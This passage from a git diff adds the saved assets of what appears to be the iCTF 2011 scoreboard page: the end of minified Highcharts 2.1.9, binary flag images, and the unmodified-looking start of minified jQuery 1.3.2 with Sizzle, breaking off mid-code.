+align:h[6]})[g.moved?"animate":"attr"]({x:Y+d.x+({left:e,right:-e}[h[6]]||0),y:H+d.y});g.moved=true;if(P&&f){g=b.connector;h=i?[Za,Y+(h[6]==="left"?5:-5),H,"C",Y,H,2*h[2]-h[4],2*h[3]-h[5],h[2],h[3],Ka,h[4],h[5]]:[Za,Y+(h[6]==="left"?5:-5),H,Ka,h[2],h[3],Ka,h[4],h[5]];if(g){g.animate({d:h});g.attr("visibility",U)}else b.connector=g=this.chart.renderer.path(h).attr({"stroke-width":f,stroke:d.connectorColor||b.color||"#606060",visibility:U,zIndex:3}).translate(c.plotLeft,c.plotTop).add()}}}}},drawTracker:hd.prototype.drawTracker, +getSymbol:function(){}});wb.pie=ma;db.Highcharts={Chart:Nd,dateFormat:Zc,pathAnim:Nc,getOptions:function(){return Xa},hasRtlBug:me,numberFormat:Ed,Point:Oc,Color:bc,Renderer:fd,seriesTypes:wb,setOptions:function(a){Xa=Ca(Xa,a);Id();return Xa},Series:sb,addEvent:Qa,removeEvent:pb,createElement:hb,discardElement:pc,css:Ja,each:u,extend:sa,map:tc,merge:Ca,pick:A,extendClass:yb,product:"Highcharts",version:"2.1.9"}})(); diff --git a/ictf2011/scoreboard.ictf2011.info_files/hu.png b/ictf2011/scoreboard.ictf2011.info_files/hu.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011.info_files/in.png b/ictf2011/scoreboard.ictf2011.info_files/in.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011.info_files/it.png b/ictf2011/scoreboard.ictf2011.info_files/it.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011.info_files/jquery.min.js b/ictf2011/scoreboard.ictf2011.info_files/jquery.min.js @@ -0,0 +1,19 @@ +/* + * jQuery JavaScript Library v1.3.2 + * http://jquery.com/ + * + * Copyright (c) 2009 John Resig + * Dual licensed under the MIT and GPL licenses. + * http://docs.jquery.com/License + * + * Date: 2009-02-19 17:34:21 -0500 (Thu, 19 Feb 2009) + * Revision: 6246 + */ +(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document;F.selector=E;return F}}else{return o(H).find(E)}}else{if(o.isFunction(E)){return o(document).ready(E)}}if(E.selector&&E.context){this.selector=E.selector;this.context=E.context}return this.setArray(o.isArray(E)?E:o.makeArray(E))},selector:"",jquery:"1.3.2",size:function(){return this.length},get:function(E){return E===g?Array.prototype.slice.call(this):this[E]},pushStack:function(F,H,E){var G=o(F);G.prevObject=this;G.context=this.context;if(H==="find"){G.selector=this.selector+(this.selector?" ":"")+E}else{if(H){G.selector=this.selector+"."+H+"("+E+")"}}return G},setArray:function(E){this.length=0;Array.prototype.push.apply(this,E);return this},each:function(F,E){return o.each(this,F,E)},index:function(E){return o.inArray(E&&E.jquery?E[0]:E,this)},attr:function(F,H,G){var E=F;if(typeof F==="string"){if(H===g){return this[0]&&o[G||"attr"](this[0],F)}else{E={};E[F]=H}}return this.each(function(I){for(F in E){o.attr(G?this.style:this,F,o.prop(this,E[F],G,I,F))}})},css:function(E,F){if((E=="width"||E=="height")&&parseFloat(F)<0){F=g}return this.attr(E,F,"curCSS")},text:function(F){if(typeof F!=="object"&&F!=null){return this.empty().append((this[0]&&this[0].ownerDocument||document).createTextNode(F))}var E="";o.each(F||this,function(){o.each(this.childNodes,function(){if(this.nodeType!=8){E+=this.nodeType!=1?this.nodeValue:o.fn.text([this])}})});return E},wrapAll:function(E){if(this[0]){var F=o(E,this[0].ownerDocument).clone();if(this[0].parentNode){F.insertBefore(this[0])}F.map(function(){var G=this;while(G.firstChild){G=G.firstChild}return G}).append(this)}return this},wrapInner:function(E){return this.each(function(){o(this).contents().wrapAll(E)})},wrap:function(E){return this.each(function(){o(this).wrapAll(E)})},append:function(){return this.domManip(arguments,true,function(E){if(this.nodeType==1){this.appendChild(E)}})},prepend:function(){return this.domManip(arguments,true,function(E){if(this.nodeType==1){this.insertBefore(E,this.firstChild)}})},before:function(){return this.domManip(arguments,false,function(E){this.parentNode.insertBefore(E,this)})},after:function(){return this.domManip(arguments,false,function(E){this.parentNode.insertBefore(E,this.nextSibling)})},end:function(){return this.prevObject||o([])},push:[].push,sort:[].sort,splice:[].splice,find:function(E){if(this.length===1){var F=this.pushStack([],"find",E);F.length=0;o.find(E,this[0],F);return F}else{return this.pushStack(o.unique(o.map(this,function(G){return o.find(E,G)})),"find",E)}},clone:function(G){var E=this.map(function(){if(!o.support.noCloneEvent&&!o.isXMLDoc(this)){var I=this.outerHTML;if(!I){var J=this.ownerDocument.createElement("div");J.appendChild(this.cloneNode(true));I=J.innerHTML}return o.clean([I.replace(/ jQuery\d+="(?:\d+|null)"/g,"").replace(/^\s*/,"")])[0]}else{return this.cloneNode(true)}});if(G===true){var H=this.find("*").andSelf(),F=0;E.find("*").andSelf().each(function(){if(this.nodeName!==H[F].nodeName){return}var I=o.data(H[F],"events");for(var K in I){for(var J in I[K]){o.event.add(this,K,I[K][J],I[K][J].data)}}F++})}return E},filter:function(E){return this.pushStack(o.isFunction(E)&&o.grep(this,function(G,F){return E.call(G,F)})||o.multiFilter(E,o.grep(this,function(F){return F.nodeType===1})),"filter",E)},closest:function(E){var G=o.expr.match.POS.test(E)?o(E):null,F=0;return this.map(function(){var H=this;while(H&&H.ownerDocument){if(G?G.index(H)>-1:o(H).is(E)){o.data(H,"closest",F);return H}H=H.parentNode;F++}})},not:function(E){if(typeof E==="string"){if(f.test(E)){return this.pushStack(o.multiFilter(E,this,true),"not",E)}else{E=o.multiFilter(E,this)}}var F=E.length&&E[E.length-1]!==g&&!E.nodeType;return this.filter(function(){return F?o.inArray(this,E)<0:this!=E})},add:function(E){return this.pushStack(o.unique(o.merge(this.get(),typeof E==="string"?o(E):o.makeArray(E))))},is:function(E){return !!E&&o.multiFilter(E,this).length>0},hasClass:function(E){return !!E&&this.is("."+E)},val:function(K){if(K===g){var E=this[0];if(E){if(o.nodeName(E,"option")){return(E.attributes.value||{}).specified?E.value:E.text}if(o.nodeName(E,"select")){var I=E.selectedIndex,L=[],M=E.options,H=E.type=="select-one";if(I<0){return null}for(var F=H?I:0,J=H?I+1:M.length;F<J;F++){var G=M[F];if(G.selected){K=o(G).val();if(H){return K}L.push(K)}}return L}return(E.value||"").replace(/\r/g,"")}return g}if(typeof K==="number"){K+=""}return this.each(function(){if(this.nodeType!=1){return}if(o.isArray(K)&&/radio|checkbox/.test(this.type)){this.checked=(o.inArray(this.value,K)>=0||o.inArray(this.name,K)>=0)}else{if(o.nodeName(this,"select")){var N=o.makeArray(K);o("option",this).each(function(){this.selected=(o.inArray(this.value,N)>=0||o.inArray(this.text,N)>=0)});if(!N.length){this.selectedIndex=-1}}else{this.value=K}}})},html:function(E){return E===g?(this[0]?this[0].innerHTML.replace(/ jQuery\d+="(?:\d+|null)"/g,""):null):this.empty().append(E)},replaceWith:function(E){return this.after(E).remove()},eq:function(E){return this.slice(E,+E+1)},slice:function(){return this.pushStack(Array.prototype.slice.apply(this,arguments),"slice",Array.prototype.slice.call(arguments).join(","))},map:function(E){return this.pushStack(o.map(this,function(G,F){return E.call(G,F,G)}))},andSelf:function(){return this.add(this.prevObject)},domManip:function(J,M,L){if(this[0]){var I=(this[0].ownerDocument||this[0]).createDocumentFragment(),F=o.clean(J,(this[0].ownerDocument||this[0]),I),H=I.firstChild;if(H){for(var G=0,E=this.length;G<E;G++){L.call(K(this[G],H),this.length>1||G>0?I.cloneNode(true):I)}}if(F){o.each(F,z)}}return this;function K(N,O){return M&&o.nodeName(N,"table")&&o.nodeName(O,"tr")?(N.getElementsByTagName("tbody")[0]||N.appendChild(N.ownerDocument.createElement("tbody"))):N}}};o.fn.init.prototype=o.fn;function z(E,F){if(F.src){o.ajax({url:F.src,async:false,dataType:"script"})}else{o.globalEval(F.text||F.textContent||F.innerHTML||"")}if(F.parentNode){F.parentNode.removeChild(F)}}function e(){return +new Date}o.extend=o.fn.extend=function(){var J=arguments[0]||{},H=1,I=arguments.length,E=false,G;if(typeof J==="boolean"){E=J;J=arguments[1]||{};H=2}if(typeof J!=="object"&&!o.isFunction(J)){J={}}if(I==H){J=this;--H}for(;H<I;H++){if((G=arguments[H])!=null){for(var F in G){var K=J[F],L=G[F];if(J===L){continue}if(E&&L&&typeof L==="object"&&!L.nodeType){J[F]=o.extend(E,K||(L.length!=null?[]:{}),L)}else{if(L!==g){J[F]=L}}}}}return J};var b=/z-?index|font-?weight|opacity|zoom|line-?height/i,q=document.defaultView||{},s=Object.prototype.toString;o.extend({noConflict:function(E){l.$=p;if(E){l.jQuery=y}return o},isFunction:function(E){return s.call(E)==="[object Function]"},isArray:function(E){return s.call(E)==="[object Array]"},isXMLDoc:function(E){return E.nodeType===9&&E.documentElement.nodeName!=="HTML"||!!E.ownerDocument&&o.isXMLDoc(E.ownerDocument)},globalEval:function(G){if(G&&/\S/.test(G)){var F=document.getElementsByTagName("head")[0]||document.documentElement,E=document.createElement("script");E.type="text/javascript";if(o.support.scriptEval){E.appendChild(document.createTextNode(G))}else{E.text=G}F.insertBefore(E,F.firstChild);F.removeChild(E)}},nodeName:function(F,E){return F.nodeName&&F.nodeName.toUpperCase()==E.toUpperCase()},each:function(G,K,F){var E,H=0,I=G.length;if(F){if(I===g){for(E in G){if(K.apply(G[E],F)===false){break}}}else{for(;H<I;){if(K.apply(G[H++],F)===false){break}}}}else{if(I===g){for(E in G){if(K.call(G[E],E,G[E])===false){break}}}else{for(var J=G[0];H<I&&K.call(J,H,J)!==false;J=G[++H]){}}}return G},prop:function(H,I,G,F,E){if(o.isFunction(I)){I=I.call(H,F)}return typeof I==="number"&&G=="curCSS"&&!b.test(E)?I+"px":I},className:{add:function(E,F){o.each((F||"").split(/\s+/),function(G,H){if(E.nodeType==1&&!o.className.has(E.className,H)){E.className+=(E.className?" ":"")+H}})},remove:function(E,F){if(E.nodeType==1){E.className=F!==g?o.grep(E.className.split(/\s+/),function(G){return !o.className.has(F,G)}).join(" "):""}},has:function(F,E){return F&&o.inArray(E,(F.className||F).toString().split(/\s+/))>-1}},swap:function(H,G,I){var E={};for(var F in G){E[F]=H.style[F];H.style[F]=G[F]}I.call(H);for(var F in G){H.style[F]=E[F]}},css:function(H,F,J,E){if(F=="width"||F=="height"){var L,G={position:"absolute",visibility:"hidden",display:"block"},K=F=="width"?["Left","Right"]:["Top","Bottom"];function I(){L=F=="width"?H.offsetWidth:H.offsetHeight;if(E==="border"){return}o.each(K,function(){if(!E){L-=parseFloat(o.curCSS(H,"padding"+this,true))||0}if(E==="margin"){L+=parseFloat(o.curCSS(H,"margin"+this,true))||0}else{L-=parseFloat(o.curCSS(H,"border"+this+"Width",true))||0}})}if(H.offsetWidth!==0){I()}else{o.swap(H,G,I)}return Math.max(0,Math.round(L))}return o.curCSS(H,F,J)},curCSS:function(I,F,G){var L,E=I.style;if(F=="opacity"&&!o.support.opacity){L=o.attr(E,"opacity");return L==""?"1":L}if(F.match(/float/i)){F=w}if(!G&&E&&E[F]){L=E[F]}else{if(q.getComputedStyle){if(F.match(/float/i)){F="float"}F=F.replace(/([A-Z])/g,"-$1").toLowerCase();var M=q.getComputedStyle(I,null);if(M){L=M.getPropertyValue(F)}if(F=="opacity"&&L==""){L="1"}}else{if(I.currentStyle){var J=F.replace(/\-(\w)/g,function(N,O){return O.toUpperCase()});L=I.currentStyle[F]||I.currentStyle[J];if(!/^\d+(px)?$/i.test(L)&&/^\d/.test(L)){var H=E.left,K=I.runtimeStyle.left;I.runtimeStyle.left=I.currentStyle.left;E.left=L||0;L=E.pixelLeft+"px";E.left=H;I.runtimeStyle.left=K}}}}return L},clean:function(F,K,I){K=K||document;if(typeof K.createElement==="undefined"){K=K.ownerDocument||K[0]&&K[0].ownerDocument||document}if(!I&&F.length===1&&typeof F[0]==="string"){var H=/^<(\w+)\s*\/?>$/.exec(F[0]);if(H){return[K.createElement(H[1])]}}var G=[],E=[],L=K.createElement("div");o.each(F,function(P,S){if(typeof S==="number"){S+=""}if(!S){return}if(typeof S==="string"){S=S.replace(/(<(\w+)[^>]*?)\/>/g,function(U,V,T){return T.match(/^(abbr|br|col|img|input|link|meta|param|hr|area|embed)$/i)?U:V+"></"+T+">"});var O=S.replace(/^\s+/,"").substring(0,10).toLowerCase();var Q=!O.indexOf("<opt")&&[1,"<select multiple='multiple'>","</select>"]||!O.indexOf("<leg")&&[1,"<fieldset>","</fieldset>"]||O.match(/^<(thead|tbody|tfoot|colg|cap)/)&&[1,"<table>","</table>"]||!O.indexOf("<tr")&&[2,"<table><tbody>","</tbody></table>"]||(!O.indexOf("<td")||!O.indexOf("<th"))&&[3,"<table><tbody><tr>","</tr></tbody></table>"]||!O.indexOf("<col")&&[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"]||!o.support.htmlSerialize&&[1,"div<div>","</div>"]||[0,"",""];L.innerHTML=Q[1]+S+Q[2];while(Q[0]--){L=L.lastChild}if(!o.support.tbody){var R=/<tbody/i.test(S),N=!O.indexOf("<table")&&!R?L.firstChild&&L.firstChild.childNodes:Q[1]=="<table>"&&!R?L.childNodes:[];for(var M=N.length-1;M>=0;--M){if(o.nodeName(N[M],"tbody")&&!N[M].childNodes.length){N[M].parentNode.removeChild(N[M])}}}if(!o.support.leadingWhitespace&&/^\s/.test(S)){L.insertBefore(K.createTextNode(S.match(/^\s*/)[0]),L.firstChild)}S=o.makeArray(L.childNodes)}if(S.nodeType){G.push(S)}else{G=o.merge(G,S)}});if(I){for(var J=0;G[J];J++){if(o.nodeName(G[J],"script")&&(!G[J].type||G[J].type.toLowerCase()==="text/javascript")){E.push(G[J].parentNode?G[J].parentNode.removeChild(G[J]):G[J])}else{if(G[J].nodeType===1){G.splice.apply(G,[J+1,0].concat(o.makeArray(G[J].getElementsByTagName("script"))))}I.appendChild(G[J])}}return E}return G},attr:function(J,G,K){if(!J||J.nodeType==3||J.nodeType==8){return g}var H=!o.isXMLDoc(J),L=K!==g;G=H&&o.props[G]||G;if(J.tagName){var F=/href|src|style/.test(G);if(G=="selected"&&J.parentNode){J.parentNode.selectedIndex}if(G in J&&H&&!F){if(L){if(G=="type"&&o.nodeName(J,"input")&&J.parentNode){throw"type property can't be changed"}J[G]=K}if(o.nodeName(J,"form")&&J.getAttributeNode(G)){return J.getAttributeNode(G).nodeValue}if(G=="tabIndex"){var I=J.getAttributeNode("tabIndex");return I&&I.specified?I.value:J.nodeName.match(/(button|input|object|select|textarea)/i)?0:J.nodeName.match(/^(a|area)$/i)&&J.href?0:g}return J[G]}if(!o.support.style&&H&&G=="style"){return o.attr(J.style,"cssText",K)}if(L){J.setAttribute(G,""+K)}var E=!o.support.hrefNormalized&&H&&F?J.getAttribute(G,2):J.getAttribute(G);return E===null?g:E}if(!o.support.opacity&&G=="opacity"){if(L){J.zoom=1;J.filter=(J.filter||"").replace(/alpha\([^)]*\)/,"")+(parseInt(K)+""=="NaN"?"":"alpha(opacity="+K*100+")")}return J.filter&&J.filter.indexOf("opacity=")>=0?(parseFloat(J.filter.match(/opacity=([^)]*)/)[1])/100)+"":""}G=G.replace(/-([a-z])/ig,function(M,N){return N.toUpperCase()});if(L){J[G]=K}return J[G]},trim:function(E){return(E||"").replace(/^\s+|\s+$/g,"")},makeArray:function(G){var E=[];if(G!=null){var F=G.length;if(F==null||typeof G==="string"||o.isFunction(G)||G.setInterval){E[0]=G}else{while(F){E[--F]=G[F]}}}return E},inArray:function(G,H){for(var E=0,F=H.length;E<F;E++){if(H[E]===G){return E}}return -1},merge:function(H,E){var F=0,G,I=H.length;if(!o.support.getAll){while((G=E[F++])!=null){if(G.nodeType!=8){H[I++]=G}}}else{while((G=E[F++])!=null){H[I++]=G}}return H},unique:function(K){var F=[],E={};try{for(var G=0,H=K.length;G<H;G++){var J=o.data(K[G]);if(!E[J]){E[J]=true;F.push(K[G])}}}catch(I){F=K}return F},grep:function(F,J,E){var G=[];for(var H=0,I=F.length;H<I;H++){if(!E!=!J(F[H],H)){G.push(F[H])}}return G},map:function(E,J){var F=[];for(var G=0,H=E.length;G<H;G++){var I=J(E[G],G);if(I!=null){F[F.length]=I}}return F.concat.apply([],F)}});var C=navigator.userAgent.toLowerCase();o.browser={version:(C.match(/.+(?:rv|it|ra|ie)[\/: ]([\d.]+)/)||[0,"0"])[1],safari:/webkit/.test(C),opera:/opera/.test(C),msie:/msie/.test(C)&&!/opera/.test(C),mozilla:/mozilla/.test(C)&&!/(compatible|webkit)/.test(C)};o.each({parent:function(E){return E.parentNode},parents:function(E){return o.dir(E,"parentNode")},next:function(E){return o.nth(E,2,"nextSibling")},prev:function(E){return o.nth(E,2,"previousSibling")},nextAll:function(E){return o.dir(E,"nextSibling")},prevAll:function(E){return o.dir(E,"previousSibling")},siblings:function(E){return o.sibling(E.parentNode.firstChild,E)},children:function(E){return o.sibling(E.firstChild)},contents:function(E){return o.nodeName(E,"iframe")?E.contentDocument||E.contentWindow.document:o.makeArray(E.childNodes)}},function(E,F){o.fn[E]=function(G){var H=o.map(this,F);if(G&&typeof G=="string"){H=o.multiFilter(G,H)}return this.pushStack(o.unique(H),E,G)}});o.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(E,F){o.fn[E]=function(G){var J=[],L=o(G);for(var K=0,H=L.length;K<H;K++){var I=(K>0?this.clone(true):this).get();o.fn[F].apply(o(L[K]),I);J=J.concat(I)}return this.pushStack(J,E,G)}});o.each({removeAttr:function(E){o.attr(this,E,"");if(this.nodeType==1){this.removeAttribute(E)}},addClass:function(E){o.className.add(this,E)},removeClass:function(E){o.className.remove(this,E)},toggleClass:function(F,E){if(typeof E!=="boolean"){E=!o.className.has(this,F)}o.className[E?"add":"remove"](this,F)},remove:function(E){if(!E||o.filter(E,[this]).length){o("*",this).add([this]).each(function(){o.event.remove(this);o.removeData(this)});if(this.parentNode){this.parentNode.removeChild(this)}}},empty:function(){o(this).children().remove();while(this.firstChild){this.removeChild(this.firstChild)}}},function(E,F){o.fn[E]=function(){return this.each(F,arguments)}});function j(E,F){return E[0]&&parseInt(o.curCSS(E[0],F,true),10)||0}var h="jQuery"+e(),v=0,A={};o.extend({cache:{},data:function(F,E,G){F=F==l?A:F;var H=F[h];if(!H){H=F[h]=++v}if(E&&!o.cache[H]){o.cache[H]={}}if(G!==g){o.cache[H][E]=G}return E?o.cache[H][E]:H},removeData:function(F,E){F=F==l?A:F;var H=F[h];if(E){if(o.cache[H]){delete o.cache[H][E];E="";for(E in o.cache[H]){break}if(!E){o.removeData(F)}}}else{try{delete F[h]}catch(G){if(F.removeAttribute){F.removeAttribute(h)}}delete o.cache[H]}},queue:function(F,E,H){if(F){E=(E||"fx")+"queue";var G=o.data(F,E);if(!G||o.isArray(H)){G=o.data(F,E,o.makeArray(H))}else{if(H){G.push(H)}}}return G},dequeue:function(H,G){var E=o.queue(H,G),F=E.shift();if(!G||G==="fx"){F=E[0]}if(F!==g){F.call(H)}}});o.fn.extend({data:function(E,G){var H=E.split(".");H[1]=H[1]?"."+H[1]:"";if(G===g){var F=this.triggerHandler("getData"+H[1]+"!",[H[0]]);if(F===g&&this.length){F=o.data(this[0],E)}return F===g&&H[1]?this.data(H[0]):F}else{return this.trigger("setData"+H[1]+"!",[H[0],G]).each(function(){o.data(this,E,G)})}},removeData:function(E){return this.each(function(){o.removeData(this,E)})},queue:function(E,F){if(typeof E!=="string"){F=E;E="fx"}if(F===g){return o.queue(this[0],E)}return this.each(function(){var G=o.queue(this,E,F);if(E=="fx"&&G.length==1){G[0].call(this)}})},dequeue:function(E){return this.each(function(){o.dequeue(this,E)})}}); +/* + * Sizzle CSS Selector Engine - v0.9.3 + * Copyright 2009, The Dojo Foundation + * Released under the MIT, BSD, and GPL Licenses. + * More information: http://sizzlejs.com/ + */ +(function(){var R=/((?:\((?:\([^()]+\)|[^()]+)+\)|\[(?:\[[^[\]]*\]|['"][^'"]*['"]|[^[\]'"]+)+\]|\\.|[^ >+~,(\[\\]+)+|[>+~])(\s*,\s*)?/g,L=0,H=Object.prototype.toString;var F=function(Y,U,ab,ac){ab=ab||[];U=U||document;if(U.nodeType!==1&&U.nodeType!==9){return[]}if(!Y||typeof Y!=="string"){return ab}var Z=[],W,af,ai,T,ad,V,X=true;R.lastIndex=0;while((W=R.exec(Y))!==null){Z.push(W[1]);if(W[2]){V=RegExp.rightContext;break}}if(Z.length>1&&M.exec(Y)){if(Z.length===2&&I.relative[Z[0]]){af=J(Z[0]+Z[1],U)}else{af=I.relative[Z[0]]?[U]:F(Z.shift(),U);while(Z.length){Y=Z.shift();if(I.relative[Y]){Y+=Z.shift()}af=J(Y,af)}}}else{var ae=ac?{expr:Z.pop(),set:E(ac)}:F.find(Z.pop(),Z.length===1&&U.parentNode?U.parentNode:U,Q(U));af=F.filter(ae.expr,ae.set);if(Z.length>0){ai=E(af)}else{X=false}while(Z.length){var ah=Z.pop(),ag=ah;if(!I.relative[ah]){ah=""}else{ag=Z.pop()}if(ag==null){ag=U}I.relative[ah](ai,ag,Q(U))}}if(!ai){ai=af}if(!ai){throw"Syntax error, unrecognized expression: "+(ah||Y)}if(H.call(ai)==="[object Array]"){if(!X){ab.push.apply(ab,ai)}else{if(U.nodeType===1){for(var aa=0;ai[aa]!=null;aa++){if(ai[aa]&&(ai[aa]===true||ai[aa].nodeType===1&&K(U,ai[aa]))){ab.push(af[aa])}}}else{for(var aa=0;ai[aa]!=null;aa++){if(ai[aa]&&ai[aa].nodeType===1){ab.push(af[aa])}}}}}else{E(ai,ab)}if(V){F(V,U,ab,ac);if(G){hasDuplicate=false;ab.sort(G);if(hasDuplicate){for(var aa=1;aa<ab.length;aa++){if(ab[aa]===ab[aa-1]){ab.splice(aa--,1)}}}}}return ab};F.matches=function(T,U){return F(T,null,null,U)};F.find=function(aa,T,ab){var Z,X;if(!aa){return[]}for(var W=0,V=I.order.length;W<V;W++){var Y=I.order[W],X;if((X=I.match[Y].exec(aa))){var U=RegExp.leftContext;if(U.substr(U.length-1)!=="\\"){X[1]=(X[1]||"").replace(/\\/g,"");Z=I.find[Y](X,T,ab);if(Z!=null){aa=aa.replace(I.match[Y],"");break}}}}if(!Z){Z=T.getElementsByTagName("*")}return{set:Z,expr:aa}};F.filter=function(ad,ac,ag,W){var V=ad,ai=[],aa=ac,Y,T,Z=ac&&ac[0]&&Q(ac[0]);while(ad&&ac.length){for(var ab in I.filter){if((Y=I.match[ab].exec(ad))!=null){var U=I.filter[ab],ah,af;T=false;if(aa==ai){ai=[]}if(I.preFilter[ab]){Y=I.preFilter[ab](Y,aa,ag,ai,W,Z);if(!Y){T=ah=true}else{if(Y===true){continue}}}if(Y){for(var X=0;(af=aa[X])!=null;X++){if(af){ah=U(af,Y,X,aa);var ae=W^!!ah;if(ag&&ah!=null){if(ae){T=true}else{aa[X]=false}}else{if(ae){ai.push(af);T=true}}}}}if(ah!==g){if(!ag){aa=ai}ad=ad.replace(I.match[ab],"");if(!T){return[]}break}}}if(ad==V){if(T==null){throw"Syntax error, unrecognized expression: "+ad}else{break}}V=ad}return aa};var I=F.selectors={order:["ID","NAME","TAG"],match:{ID:/#((?:[\w\u00c0-\uFFFF_-]|\\.)+)/,CLASS:/\.((?:[\w\u00c0-\uFFFF_-]|\\.)+)/,NAME:/\[name=['"]*((?:[\w\u00c0-\uFFFF_-]|\\.)+)['"]*\]/,ATTR:/\[\s*((?:[\w\u00c0-\uFFFF_-]|\\.)+)\s*(?:(\S?=)\s*(['"]*)(.*?)\3|)\s*\]/,TAG:/^((?:[\w\u00c0-\uFFFF\*_-]|\\.)+)/,CHILD:/:(only|nth|last|first)-child(?:\((even|odd|[\dn+-]*)\))?/,POS:/:(nth|eq|gt|lt|first|last|even|odd)(?:\((\d*)\))?(?=[^-]|$)/,PSEUDO:/:((?:[\w\u00c0-\uFFFF_-]|\\.)+)(?:\((['"]*)((?:\([^\)]+\)|[^\2\(\)]*)+)\2\))?/},attrMap:{"class":"className","for":"htmlFor"},attrHandle:{href:function(T){return T.getAttribute("href")}},relative:{"+":function(aa,T,Z){var X=typeof T==="string",ab=X&&!/\W/.test(T),Y=X&&!ab;if(ab&&!Z){T=T.toUpperCase()}for(var W=0,V=aa.length,U;W<V;W++){if((U=aa[W])){while((U=U.previousSibling)&&U.nodeType!==1){}aa[W]=Y||U&&U.nodeName===T?U||false:U===T}}if(Y){F.filter(T,aa,true)}},">":function(Z,U,aa){var X=typeof U==="string";if(X&&!/\W/.test(U)){U=aa?U:U.toUpperCase();for(var V=0,T=Z.length;V<T;V++){var Y=Z[V];if(Y){var W=Y.parentNode;Z[V]=W.nodeName===U?W:false}}}else{for(var V=0,T=Z.length;V<T;V++){var Y=Z[V];if(Y){Z[V]=X?Y.parentNode:Y.parentNode===U}}if(X){F.filter(U,Z,true)}}},"":function(W,U,Y){var V=L++,T=S;if(!U.match(/\W/)){var X=U=Y?U:U.toUpperCase();T=P}T("parentNode",U,V,W,X,Y)},"~":function(W,U,Y){var V=L++,T=S;if(typeof U==="string"&&!U.match(/\W/)){var X=U=Y?U:U.toUpperCase();T=P}T("previousSibling",U,V,W,X,Y)}},find:{ID:function(U,V,W){if(typeof V.getElementById!=="undefined"&&!W){var T=V.getElementById(U[1]);return T?[T]:[]}},NAME:function(V,Y,Z){if(typeof Y.getElementsByName!=="undefined"){var U=[],X=Y.getElementsByName(V[1]);for(var W=0,T=X.length;W<T;W++){if(X[W].getAttribute("name")===V[1]){U.push(X[W])}}return U.length===0?null:U}},TAG:function(T,U){return U.getElementsByTagName(T[1])}},preFilter:{CLASS:function(W,U,V,T,Z,aa){W=" "+W[1].replace(/\\/g,"")+" ";if(aa){return W}for(var X=0,Y;(Y=U[X])!=null;X++){if(Y){if(Z^(Y.className&&(" "+Y.className+" ").indexOf(W)>=0)){if(!V){T.push(Y)}}else{if(V){U[X]=false}}}}return false},ID:function(T){return T[1].replace(/\\/g,"")},TAG:function(U,T){for(var V=0;T[V]===false;V++){}return T[V]&&Q(T[V])?U[1]:U[1].toUpperCase()},CHILD:function(T){if(T[1]=="nth"){var U=/(-?)(\d*)n((?:\+|-)?\d*)/.exec(T[2]=="even"&&"2n"||T[2]=="odd"&&"2n+1"||!/\D/.test(T[2])&&"0n+"+T[2]||T[2]);T[2]=(U[1]+(U[2]||1))-0;T[3]=U[3]-0}T[0]=L++;return T},ATTR:function(X,U,V,T,Y,Z){var W=X[1].replace(/\\/g,"");if(!Z&&I.attrMap[W]){X[1]=I.attrMap[W]}if(X[2]==="~="){X[4]=" "+X[4]+" "}return X},PSEUDO:function(X,U,V,T,Y){if(X[1]==="not"){if(X[3].match(R).length>1||/^\w/.test(X[3])){X[3]=F(X[3],null,null,U)}else{var W=F.filter(X[3],U,V,true^Y);if(!V){T.push.apply(T,W)}return false}}else{if(I.match.POS.test(X[0])||I.match.CHILD.test(X[0])){return true}}return X},POS:function(T){T.unshift(true);return T}},filters:{enabled:function(T){return T.disabled===false&&T.type!=="hidden"},disabled:function(T){return T.disabled===true},checked:function(T){return T.checked===true},selected:function(T){T.parentNode.selectedIndex;return T.selected===true},parent:function(T){return !!T.firstChild},empty:function(T){return !T.firstChild},has:function(V,U,T){return !!F(T[3],V).length},header:function(T){return/h\d/i.test(T.nodeName)},text:function(T){return"text"===T.type},radio:function(T){return"radio"===T.type},checkbox:function(T){return"checkbox"===T.type},file:function(T){return"file"===T.type},password:function(T){return"password"===T.type},submit:function(T){return"submit"===T.type},image:function(T){return"image"===T.type},reset:function(T){return"reset"===T.type},button:function(T){return"button"===T.type||T.nodeName.toUpperCase()==="BUTTON"},input:function(T){return/input|select|textarea|button/i.test(T.nodeName)}},setFilters:{first:function(U,T){return T===0},last:function(V,U,T,W){return U===W.length-1},even:function(U,T){return T%2===0},odd:function(U,T){return T%2===1},lt:function(V,U,T){return U<T[3]-0},gt:function(V,U,T){return U>T[3]-0},nth:function(V,U,T){return T[3]-0==U},eq:function(V,U,T){return T[3]-0==U}},filter:{PSEUDO:function(Z,V,W,aa){var U=V[1],X=I.filters[U];if(X){return X(Z,W,V,aa)}else{if(U==="contains"){return(Z.textContent||Z.innerText||"").indexOf(V[3])>=0}else{if(U==="not"){var Y=V[3];for(var W=0,T=Y.length;W<T;W++){if(Y[W]===Z){return false}}return true}}}},CHILD:function(T,W){var Z=W[1],U=T;switch(Z){case"only":case"first":while(U=U.previousSibling){if(U.nodeType===1){return false}}if(Z=="first"){return true}U=T;case"last":while(U=U.nextSibling){if(U.nodeType===1){return false}}return true;case"nth":var V=W[2],ac=W[3];if(V==1&&ac==0){return true}var Y=W[0],ab=T.parentNode;if(ab&&(ab.sizcache!==Y||!T.nodeIndex)){var X=0;for(U=ab.firstChild;U;U=U.nextSibling){if(U.nodeType===1){U.nodeIndex=++X}}ab.sizcache=Y}var aa=T.nodeIndex-ac;if(V==0){return aa==0}else{return(aa%V==0&&aa/V>=0)}}},ID:function(U,T){return U.nodeType===1&&U.getAttribute("id")===T},TAG:function(U,T){return(T==="*"&&U.nodeType===1)||U.nodeName===T},CLASS:function(U,T){return(" "+(U.className||U.getAttribute("class"))+" ").indexOf(T)>-1},ATTR:function(Y,W){var 